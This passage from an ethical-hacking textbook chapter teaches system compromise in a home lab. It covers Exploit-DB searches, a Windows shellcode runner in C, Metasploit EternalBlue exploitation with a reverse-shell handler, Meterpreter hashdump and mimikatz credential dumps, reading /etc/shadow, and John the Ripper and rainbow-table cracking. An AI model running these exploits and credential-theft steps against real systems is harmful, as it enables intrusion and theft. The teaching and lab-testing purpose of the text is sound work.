OpenSSH 2.x/3.0.1/3.0.2 - Channel      | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/A     | exploits/linux/remote/21402.txt
OpenSSH 3.x - Challenge-Response B     | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response B     | exploits/unix/remote/21579.txt
OpenSSH 4.3 p1 - Duplicated Block      | exploits/multiple/dos/2444.sh
OpenSSH 6.8 < 6.9 - 'PTY' Local Pr     | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service        | exploits/linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xa     | exploits/multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumerati     | exploits/linux/remote/40136.py
OpenSSH < 6.6 SFTP (x64) - Command     | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execu     | exploits/linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSepar     | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arb     | exploits/linux/remote/40963.txt
OpenSSH/PAM 3.6.1p1 - 'gossh.sh' R     | exploits/linux/remote/26.sh
OpenSSH/PAM 3.6.1p1 - Remote Users     | exploits/linux/remote/25.c
OpenSSHd 7.2p2 - Username Enumerat     | exploits/linux/remote/40113.txt
Portable OpenSSH 3.6.1p-PAM/4.1-Su     | exploits/multiple/remote/3303.sh
glibc-2.2 / openssh-2.3.0p1 / glib     | exploits/linux/local/258.sh
------------------------------------------------------------------------------------
Shellcodes: No Result

The repository is broken into exploits and shellcodes. The shellcodes are what you place into overall exploit code that will provide you with shell access on the target system. The rest is about delivery and getting the shellcode into the right place. Shellcode is commonly hexadecimal representations of assembly language operation codes (opcodes), though here you may also find files that just contain the assembly language code, which would need to be converted to opcodes. All of the shellcodes in the repository are categorized by the operating system and processor type. As an example, there is a directory named windows_x86-64 in the repository. The following code listing is an example of a C program that is included in that directory. There are no comments about exactly what it does. Running searchsploit against the filename reveals that it targets the Windows 7 operating system but nothing beyond that. Interestingly, as a side note, compiling it and running it on a Linux system generates the error that stack smashing was detected, and the program crashes.

Shellcode from the Exploit-DB Repository

#include <stdio.h>

char shellcode[] =
    "\x31\xC9"                 // xor ecx, ecx
    "\x64\x8B\x71\x30"         // mov esi, [fs:ecx+0x30]
    "\x8B\x76\x0C"             // mov esi, [esi+0x0C]
    "\x8B\x76\x1C"             // mov esi, [esi+0x1c]
    "\x8B\x06"                 // mov eax, [esi]
    "\x8B\x68\x08"             // mov ebp, [eax+0x08]
    "\x68\x11\x11\x11\x11"     // push 0x11111111
    "\x66\x68\x11\x11"         // push word 0x1111
    "\x5B"                     // pop ebx
    "\x53"                     // push ebx
    "\x55"                     // push ebp
    "\x5B"                     // pop ebx
    "\x66\x81\xC3\x4B\x85"     // add bx, 0x854b
    "\xFF\xD3"                 // call ebx
    "\xEB\xEA";                // jmp short

int main(int argc, char **argv)
{
    int *ret;
    // Point at main's saved return address on the stack and overwrite it with
    // the address of the shellcode buffer, so returning from main jumps into it.
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

The website www.exploit-db.com is not the only place to look for exploits, but it is convenient. It's also probably the best legitimate site available, and the fact that it comes with a search tool makes it handy. If you want to learn a lot about exploits and how they are developed, this is a great place to go.

You don't have to limit yourself to just websites, though. There are mailing lists where announcements of vulnerabilities are made. Sometimes, along with the vulnerability announcement, you will get proof-of-concept code. How far you can get with the code depends entirely on the researcher, the vulnerability, and the software. Sometimes, what you'll get is just a demonstration that the vulnerability can be triggered, but you may not get any further access to the remote system than you had before.

There are certainly other places you can go to look for exploits. However, you start skirting the edges of ethics. The so-called dark web, or darknet, is one place you can search for exploits. If you have a Tor browser or just the software that creates a proxy server you can use to connect any browser to, you can start searching for sites where you can obtain some of this code. There are a number of search engines that you can use that are more likely to find some of these darker sites, such as NotEvil. There are considerations to keep in mind, though. One is that sites can come and go on the Tor network. Even if NotEvil turns up links in a search, you aren't guaranteed to find the site up and functional. In digging around in Tor while writing this, I found that several sites simply didn't respond. Second, you don't know the source of the exploit you find. There are two elements here. One is that it may have been obtained or developed illegally. This crosses the ethical boundaries you are required to adhere to as a Certified Ethical Hacker. Perhaps more important, though, unless you are really good at reading source code, even if the source code is obfuscated, is that you may find that you are working with infected software that could compromise you and your target in ways you didn't expect. This is why it's so important to work with legitimate and professional sites and researchers. Finally, Tor is meant as a place for anonymity. This includes not only the users who are visiting the sites but also the sites themselves. It will be time-consuming to learn where everything is located. It's also a place for illicit commerce. You may find some exploits on the Tor network, but more than likely if you do, they will be for sale rather than just offered up for the good of the community.

System Compromise

Exploitation, or system compromise, will serve two purposes for us. One of them is to
demonstrate that vulnerabilities are legitimate and not just theoretical. After all, when we do vulnerability scanning, we get an indication that a system may have a vulnerability, but until the vulnerability has been exploited, it's not guaranteed that the vulnerability exists, which means we aren't sure whether it really needs to be fixed. The second reason is that exploiting a vulnerability and compromising a system can lead us further into the organization, potentially exposing additional vulnerabilities. This is, in part, because we may get further reachability deeper into the network but also because we may be able to harvest credentials that may be used on other systems.

I'm going to cover a couple of different ways to work on system compromise. I'm going to start with Metasploit since it's such a common approach. It should be noted that Metasploit is not the only exploit framework available. There are other commercial software offerings that will do the same thing as Metasploit. Metasploit does have a commercial offering, and if you are using it for business purposes, you should be paying for the commercial license; there is a community edition as well. On top of that, you can get a copy of Kali Linux, which has Metasploit preinstalled. Other software packages will do roughly the same thing as Metasploit, and you should take a look at them to see what you may prefer in a business setting.

We can also return to Exploit-DB for some additional exploitation possibilities. Once you have a list of your vulnerabilities, you can search the exploit database for actual exploits that can be used. I will cover identifying the modules and then making use of them. In some cases, as you will see, it's not always a case of running a single script.

Metasploit Modules

If there is a known exploit for a vulnerability available, it has likely found its way into Metasploit. This is a program that was originally developed as an exploit framework. The idea was to provide building blocks so exploits could quickly be developed by putting together a set of programming modules that could be used. Additionally, shellcodes and encoders are available to put into exploits being developed. While it may have started off as an exploit framework targeting security researchers who identify vulnerabilities so they can easily create exploits, it has become a go-to tool for penetration and security testers. One of the reasons is the large number of modules available that can be used while testing systems and networks. Almost the entire life cycle of a penetration test can be handled within Metasploit. As of the moment of this writing, there are more than 1,000 auxiliary modules, many of which are scanners that can be used for reconnaissance and enumeration. Using these modules, you can learn what the network looks like and what services are available. You can also import vulnerability scans from OpenVAS, Nessus, and, of course, Nexpose, which is developed by the same company that is responsible for Metasploit.

Once you have all of this information, though, you want to move to exploitation. There are currently 1,800 exploit modules in Metasploit, though the number changes fairly regularly because of the popularity of the software and the development work by Rapid7. Metasploit makes the work of exploiting considerably easier than going through the process of creating an exploit by hand, assuming Metasploit has an exploit available. If they don't, you'll be forced to do one by hand if you can.

We're going to use the command line for this, though there are other options, like a web interface if you get the package from Rapid7. The CLI exposes everything that's happening. We're going to start with the msfconsole program. There are multiple ways of acquiring Metasploit, but for this, I'm just using an instance of Kali Linux, which has Metasploit installed by default. All I needed to do was set up the database that is used to store information about hosts, vulnerabilities, and any loot acquired. In the following listing, you can see starting up msfconsole, which is the command-line program used to interact with Metasploit.

Starting msfconsole

[email protected]:~# msfconsole
...
       To boldly go where no shell has gone before

       =[ metasploit v4.17.8-dev                          ]
+ -- --=[ 1803 exploits - 1027 auxiliary - 311 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Once msfconsole is started, we need to locate an exploit for a vulnerability that has been identified. There is a Windows Server on my home network that I'm going to use for the purpose of demonstrating exploitation. This is a Metasploitable 3 instance, so there are several vulnerable services that have been built into it, making it perfect to demonstrate with and practice on. To find an exploit, we can search for it. You'll see in the following listing a search for a module that will run the EternalBlue exploit, which takes advantage of the vulnerability described in CVE-2017-0144. There are several matches for this search. We could narrow the scope with some additional parameters, like specifying the type using type:exploit, for example. This may be useful if you have a long list of results and you need to make it easier to identify the right one.

Searching Metasploit

msf > search eternalblue

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There is more than one that we could use here, depending on what we want to accomplish. In this case, I want to get a shell on the remote system; the auxiliary module will allow us to execute a single command on the remote system, which would be the same as the one ending in psexec. As a result, we're going to use the exploit ending in 010_eternalblue, as you can see in the next code listing. This will give us a shell on the remote host. From that shell, we can start issuing commands, but more than just one, which the others would let us do.

Once we know what module we are using, we load it up using the use command in msfconsole. Each module has a set of options that can or needs to be set. In some cases, the options will have defaults already set so you don't need to do anything. The one parameter that will always need to be set is the one for the target. This will be either RHOST or RHOSTS, depending on whether the module expects to have multiple targets. A scanner module, for example, will use RHOSTS, while an exploit module will generally have RHOST as the parameter name. In the following code listing, we need to set RHOST with the IP address of the target of our exploit attempt. As expected, the exploit was successful, giving us remote access to the target system.

EternalBlue Exploit

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.86.24
RHOST => 192.168.86.24
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.86.57:4444
[*] 192.168.86.24:445 - Connecting to target for exploitation.
[+] 192.168.86.24:445 - Connection established for exploitation.
[+] 192.168.86.24:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.86.24:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.86.24:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.86.24:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.86.24:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.86.24:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.86.24:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.86.24:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.86.24:445 - Sending all but last fragment of exploit packet
[*] 192.168.86.24:445 - Starting non-paged pool grooming
[+] 192.168.86.24:445 - Sending SMBv2 buffers
[+] 192.168.86.24:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.86.24:445 - Sending final SMBv2 buffers.
[*] 192.168.86.24:445 - Sending last fragment of exploit packet!
[*] 192.168.86.24:445 - Receiving response from exploit packet
[+] 192.168.86.24:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.86.24:445 - Sending egg to corrupted connection.
[*] 192.168.86.24:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.86.57:4444 -> 192.168.86.24:50371) at 2021-01-09 19:52:40 -0600
[+] 192.168.86.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.86.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.86.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Not every vulnerability is as successful as this one. When you search for a module, you will get a ranking that indicates to you how successful the exploit is likely to be. Vulnerabilities are not always straightforward. In some cases, there may be dependencies that need to be in place before the vulnerability can be exploited. You may need to try the exploit multiple times before it succeeds. If it were easy and straightforward after all, everyone would be able to do it, which might mean more security testing was getting done, which in turn may lead to fewer bugs in software.

Exploit-DB

You can search www.exploit-db.com for exploits associated with vulnerabilities. For example, we were working with the EternalBlue exploit, which we know has a module in Metasploit. We can search www.exploit-db.com for modules that relate to the EternalBlue vulnerability. In Figure 7.2, you can see the results of that search. This shows three results that fall into Windows-related categories. These are all proof-of-concept Python scripts that you can download and run.
FIGURE 7.2 Exploit-DB search results

If you have the Exploit-DB package installed on your system, meaning you have searchsploit to use, you could just run searchsploit to do the same search. The Exploit-DB repository includes exploits and shellcodes, so the results don't include papers like the ones you get from the website. Instead, you just get the list of exploit code. Additionally, you are not required to download or look at the code in a web browser because you have the code downloaded already. In the following code listing, you can see the results of the search. What we get is the list of three exploit programs but no shellcode results. This isn't especially surprising because there is no shellcode especially associated with EternalBlue. Instead, it's just a vulnerability in the implementation of the Server Message Block (SMB) protocol.

searchsploit Results for EternalBlue

[email protected]:~# searchsploit "eternalblue"
----------------------------------------------------------------------------------
 Exploit Title                          | Path (/usr/share/exploitdb/)
----------------------------------------------------------------------------------
Microsoft Windows Windows 7/2008 R2 (x | exploits/windows_x86-64/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R | exploits/windows_x86-64/remote/42030.py
----------------------------------------------------------------------------------
Shellcodes: No Result

You can run this exploit from where it is or copy it to your home directory and run it from there. This will save you from passing in the path to the Python script when you run it. It will also allow you to make changes, if you wanted to experiment, while leaving the functional exploit code intact where it is. In the next code listing, you will see a run of 42031.py, attacking the same system we did from Metasploit. The last parameter on the command line is executable code in the file named payload. This is a combination of two separate pieces of executable code. The first is shellcode written by the author of the Python exploit. At the end of that is a stub program that sends a connection back to a system listening for it.

An exploit is the means for an external entity to cause a program to fail in a way that allows the attacker to control the flow of the program's execution. Just causing the program to fail, though, isn't enough. You need some code of your own for the program to execute on your behalf. This is the shellcode, so called because it typically provides a shell to the attacker. This means the attacker has a way to interact with the operating system directly.

Exploit of EternalBlue from Python Script

[email protected]:~# python 42031.py 192.168.86.24 payload
shellcode size: 1262
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

This is only half of the attack. What you see here is the exploit running successfully, triggering the vulnerability and getting the remote service to execute the shellcode provided. The shellcode here is an executable file created from assembly language code. It includes a Meterpreter shell and a way to connect back to the system it has been configured to call back to. This requires that you also have a listener set up. We go back to msfconsole again for this. In the following listing, you can see loading the listener module and setting the listening port and IP address. When the exploit runs on the target, you will also see the connection to the listener.

Exploit Handler

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.86.57
LHOST => 192.168.86.57
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

This gives us the ability to interact with the remote system using Meterpreter, which is an operating system–agnostic shell language. It has a number of commands that can be run against the target system regardless of what operating system the target system has. Meterpreter translates the commands passed to it into ones that are specific to the underlying operating system. This can include listing files, changing directories, uploading files, and gathering system information like passwords.
Gathering Passwords

Once you have an exploited system, you will want to start gathering information on it. One type of information is the passwords on the system. There are a couple of ways to gather these passwords. In the preceding code listing, we got a Meterpreter shell on a target system. Not all exploits in Metasploit can yield a Meterpreter shell, but if we can get one, we have a powerful ally in gathering information and performing post-exploitation work. Using Meterpreter, we can gather information about the system so we know what we're getting for password data. The command sysinfo will tell us the system name as well as the operating system. This tells us we're going to be looking at LAN Manager hashes when we grab the passwords. We can do that using the hashdump command, which you can see in the following listing.

Obtaining Passwords with Meterpreter

meterpreter > sysinfo
Computer        : WUBBLE-C765F2
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:ed174b89559f980793e287acb8bf6ba6:5f7277b8635625ad2d2d551867124dbd:::
ASPNET:1003:5b8cce8d8be0d65545aefda15894afa0:227510be54d4e5285f3537a22e855dfc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c079c0:::
HelpAssistant:1000:7e86e0590641f80063c81f86ee9efa9c:ef449e873959d4b1536660525657047d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2e54afff1eaa6b62fc0649b715104187:::

The hashdump provides the username, the user identifier, and the hash value of the password. We'll need that when it comes to cracking the password. These credentials will be helpful as we continue moving through the network. The credentials may be useful for additional vulnerabilities, or at least with different testing programs and Metasploit modules.

This is not the only way we can grab password hashes, though. There is a module named mimikatz that can be used. We still need Meterpreter, so we can load up the mimikatz module to use it. In the following listing, you can see loading mimikatz and then pulling the password hashes. You can see the results of running msv, which makes use of the MSV authentication package to pull the hashes for users. We can also use mimikatz to see if the security support provider (SSP) has credentials. Finally, we use mimikatz to pull hashes from the live SSP. Only the MSV authentication package yielded results for us on this system.

Obtaining Passwords with mimikatz

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain          User             Password
------    -------    ------          ----             --------
0;293526  NTLM       VAGRANT-2008R2  vagrant          lm{ 5229b7f52540641daad3b435b51404ee }, ntlm{ e02bc503339d51f71d913c245d35b50b }
0;96746   NTLM       VAGRANT-2008R2  sshd_server      lm{ e501ddc244ad2c14829b15382fe04c64 }, ntlm{ 8d0a16cfc061c3359db455d00ec27035 }
0;996     Negotiate  WORKGROUP       VAGRANT-2008R2$  n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY    LOCAL SERVICE    n.s. (Credentials KO)
0;20243   NTLM                                        n.s. (Credentials KO)
0;999     NTLM       WORKGROUP       VAGRANT-2008R2$  n.s. (Credentials KO)

meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============

AuthID  Package  Domain  User  Password
------  -------  ------  ----  --------

meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================

AuthID    Package    Domain          User             Password
------    -------    ------          ----             --------
0;996     Negotiate  WORKGROUP       VAGRANT-2008R2$  n.a. (livessp KO)
0;997     Negotiate  NT AUTHORITY    LOCAL SERVICE    n.a. (livessp KO)
0;293526  NTLM       VAGRANT-2008R2  vagrant          n.a. (livessp KO)
0;96746   NTLM       VAGRANT-2008R2  sshd_server      n.a. (livessp KO)
0;20243   NTLM                                        n.a. (livessp KO)
0;999     NTLM       WORKGROUP       VAGRANT-2008R2$  n.a. (livessp KO)

When we compromise a Linux system, we can't use hashdump, but we still want to grab the passwords. Either we can get a shell directly from an exploit, or if we use a Meterpreter payload, we can drop to a shell. This is where we'd be able to access the passwords. In the following code, you can see dropping to a shell from Meterpreter. From there, we can just use cat to print the contents of the /etc/shadow file. We do need to have root access to see the contents of the shadow file. You can see by running whoami that we've gained access as root. If you want to collect passwords from an exploit that doesn't give you root access, you'll need to find a privilege escalation.

Shell Access to /etc/shadow

meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::

You'll notice that there is no prompt, which can make it difficult to distinguish the commands from the output. In the output, the first command is whoami to demonstrate that the user logged in is root. After that, you can see the command cat /etc/shadow and then the output of that command. Most of the users that are shown don't have passwords. Only root and sys appear to have passwords in this output. While the means of getting to the passwords shown here is different from Windows, these are also hashes. The password hashes are generated using a different hash algorithm under Linux than under Windows. In either case, though, you can use the hashes to run through a password cracking program.

Password Cracking

Password hashes don't do us much good. You aren't ever asked to pass in a password hash when you are authenticating. The hash is generated each time a password is entered by a user. The resulting hash is then compared against the stored hash. Passing the hash in would result in it being hashed, so the resulting hash from that computation wouldn't match what
The only way to match the stored hash is to use the password, or at least use a value that will generate the same hash result. When it comes to cracking passwords, we are trying to identify a value that will generate the cryptographic hash. It is technically possible for two separate strings to generate the same hash. Since we care only about the hashes being equal, it doesn't matter if what goes in is actually the password. When two values yield the same hash, it's called a collision. A good way to make collisions unlikely is to have a larger space for the values of the hash: a hash algorithm that yields 256 bits of output has 2^128 times as many possible hash values as one that only generates 128 bits. The issue of collisions is sometimes explained through the birthday paradox, which relates to the statistical probability of two people in a room having the same birthday (month and day). For there to be a 50 percent probability that two people share a birthday, you need only 23 people in the room. At 70 people, it's a 99.9 percent probability. We don't get to 100 percent probability until we have 366 people, though.

John the Ripper

A common tool used to crack passwords is John the Ripper. John is an offline password cracking tool, which means that it works on files that have been grabbed from their original source. It has different modes that can be used to crack passwords. The first, which you will see in the next code listing, is referred to as single crack mode. Single crack mode takes information from the different fields in the file (username, home directory, GECOS name) and applies mangling rules to them to generate candidate passwords. Because the list of inputs is comparatively small, there are extensive mangling rules to vary the source text. This is the fastest mode John has to crack passwords, and it is the mode the developers of John recommend you start with.

John Single Crack Mode

root@kali:~# john passwords.txt
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-old"
Use the "--format=NT-old" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 8 password hashes with no different salts (LM [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (SUPPORT_388945a0)
                 (Guest)
BLANDES          (Administrator:1)
KSUHCP9          (HelpAssistant:2)

Two things are worth noticing in that output. John auto-detected the LM format; the warnings say the same pwdump lines could be loaded as NT hashes instead with --format=NT, which is what you want for the real password, because LM uppercases the password, caps it at 14 characters and splits it into two independent 7-character halves. That split is why the results are labeled Administrator:1 and HelpAssistant:2 (each is one half), and the blank results for SUPPORT_388945a0 and Guest mean those accounts have empty passwords.

John can also take wordlists in wordlist mode. This is a straightforward mode that takes a wordlist as input, comparing the hash of each word against the password hash. You can apply mangling rules to your wordlist, which will generate variants on the words, since people often use variations on known words as their passwords. The longer your wordlist, the better chance you will have of cracking passwords. However, the longer your wordlist, the longer the password cracking will take. Keep in mind that wordlists will only identify passwords that are in the wordlist (or produced from it by a rule). If someone is using a long passphrase or truly random characters, a wordlist won't help, and you need to try another mode.

Finally, John uses incremental mode to try every possible combination of characters. To run this mode, John needs to be told what characters to try. This may be all ASCII characters, all uppercase characters, all numbers, and so on. Each incremental mode also carries a minimum and maximum length, which you can tighten further with --max-length. Because of the number of possible variants, this mode will usually have to be stopped by hand; John can't get through all the variants in a reasonable time unless you have specified a short password length.

This run of John was against Windows passwords, as collected from hashdump in Meterpreter. If you want to work with Linux passwords, there is an additional step you have to do. In the early days of Unix, from which Linux is derived, there was a single file where user information and passwords were stored. The problem with that was that there was information regular users needed to obtain from that file, which meant permissions had to be such that anyone could read it. Since passwords were stored there, that was a problem. Anyone could read the hashes and obtain the passwords from those hashes using cracking strategies. As a result, the public information stayed in one file, still named passwd for backward compatibility, while the password hashes and the aging information that goes with them were moved to another file, readable only by root: the shadow file. We can combine the two files so that all the needed information is together and consolidated by using the unshadow program. This merges the information in the shadow file and the passwd file. Here, you can see a run of unshadow with a captured shadow file and passwd file.

Using unshadow

root@kali:~# unshadow passwd.local shadow.local
root:$6$yCc28ASu$WmFwkvikDeKL4VtJgEnYcD.PXG.4UixCikBO5jBvE3JjV43nLsfpB1z57qwLh0SNo15m5JfyQWEMhLjRv4rRO.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

As shown, most of the users don't have passwords. The only user with a password here is the root user. Once you have the two files merged using unshadow, you can run John against the result to acquire the password. John will identify the format of the file and the hash algorithm used to generate it, because that information is stored in the hash itself. The $6$ at the beginning of the password field indicates that the password has been hashed using SHA-512 crypt: the Secure Hash Algorithm with 512 bits of output, salted with the characters up to the next $ (yCc28ASu) and iterated 5,000 times by default. What comes after the salt is the hash that John will be comparing against. John, though, isn't the only way to obtain passwords from local files.

Rainbow Tables

For every password tested using John, you have to compute the hash to test against. This takes time and computational power. With today's processors, the time and computing power necessary aren't such a big deal other than that it adds up. Microseconds per word over the course of millions of words adds time. It's easier to precompute the hashes before running your checks. All you need to do then is look up the hash in an index and retrieve the plaintext that was used to create that hash. All the time-consuming work is done well before you need to crack passwords. There is a trade-off, of course. Precomputing hashes means you need to store them somewhere. Rainbow tables are the stored precomputed hashes.

The rainbow table isn't as straightforward as just a mapping between a hash and a password. The rainbow tables are stored in chains in order to limit the number of plaintext passwords stored; the plaintexts inside a chain are not stored at all but recomputed from the chain's starting point when it is needed. There are many tools that can be used to look up passwords from these tables, but first we need the tables. The RainbowCrack project has a tool to look up the password as well as a tool that will create the rainbow table. This creation tool isn't used to generate hashes from wordlists. Instead, it will generate a hash from all possible password values within the constraints provided. In the following code, you will see the use of rtgen to generate a rainbow table.

Using rtgen for Rainbow Tables

root@kali:~# rtgen md5 loweralpha-numeric 5 8 0 3800 33554432 0
rainbow table md5_loweralpha-numeric#5-8_0_3800x33554432_0.rt parameters
hash algorithm:         md5
hash length:            16
charset name:           loweralpha-numeric
charset data:           abcdefghijklmnopqrstuvwxyz0123456789
charset data in hex:    61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39
charset length:         36
plaintext length range: 5 - 8
reduce offset:          0x00000000
plaintext total:        2901711320064

sequential starting point begin from 0 (0x0000000000000000)
generating...
131072 of 33554432 rainbow chains generated (0 m 28.5 s)
262144 of 33554432 rainbow chains generated (0 m 28.5 s)
393216 of 33554432 rainbow chains generated (0 m 28.5 s)
524288 of 33554432 rainbow chains generated (0 m 28.5 s)
655360 of 33554432 rainbow chains generated (0 m 28.5 s)
786432 of 33554432 rainbow chains generated (0 m 28.5 s)
917504 of 33554432 rainbow chains generated (0 m 28.5 s)
1048576 of 33554432 rainbow chains generated (0 m 28.5 s)
1179648 of 33554432 rainbow chains generated (0 m 28.5 s)
1310720 of 33554432 rainbow chains generated (0 m 28.5 s)
1441792 of 33554432 rainbow chains generated (0 m 28.5 s)
1572864 of 33554432 rainbow chains generated (0 m 28.6 s)

You'll notice the parameters passed into rtgen. The first is the hashing algorithm used. In this case, it's Message Digest 5 (MD5), a commonly used hashing algorithm. The hashing algorithm used in the rainbow table has to match the one used in the password file. If they don't match, you aren't going to find the hash or the password. The next parameter is the character set that should be used to generate the passwords. We're using lowercase letters as well as numbers. This gives us 36 possible characters in each position. That yields 36^n values, where n is the number of positions. If we were trying to generate four-character passwords, we would have 36*36*36*36 possible passwords, which is 1,679,616, nearly 2 million four-character passwords.

We need to tell rtgen how long we want our passwords to be. The next two values on the command line are the minimum password length and the maximum password length. For our purposes, we are generating passwords that have between five and eight characters. That means a total of 36^5 + 36^6 + 36^7 + 36^8 passwords, which is 2,901,711,320,064, the plaintext total rtgen prints, or about 2.9 * 10^12. Obviously, the more password lengths we take on, the more passwords we have to generate and the larger our output will be. The next value (0) is the table index. It selects the reduction function, the function internal to rtgen that maps a hash back to a plaintext, so that tables generated with different indexes cover different parts of the password space. The next two values describe the rainbow chains. The first (3800) is the chain length: how many hash-then-reduce steps each chain runs, and therefore how many plaintexts each chain covers without storing them. The second (33554432) is the number of chains to generate. A rainbow table is a collection of chains, and only the start and end point of each chain are stored, 16 bytes per chain, so this table will occupy 512 MB on disk and cover at most 3800 * 33554432, about 1.3 * 10^11 plaintexts, a fraction of the 2.9 * 10^12 in the range. (At the rate shown, roughly 28 seconds per 131,072 chains, the whole file takes about two hours to generate.) Finally, the last value is the part index, which relates to the ability to store a large rainbow table in multiple files. To do that, keep all the other parameters the same and change this value.

Once we have a rainbow table, we can check the password file we have against it. You can see a run of the program rcrack in the next code listing. There were no results from this run because the rainbow tables that were used were very limited. To have enough in the way of rainbow tables to really crack passwords, we would need at least gigabytes, if not terabytes or more. There are two parameters here. The first is the location of the rainbow tables, which is dot (.) here, meaning the local directory. The second tells rcrack that the file being provided is a set of LAN Man hashes.
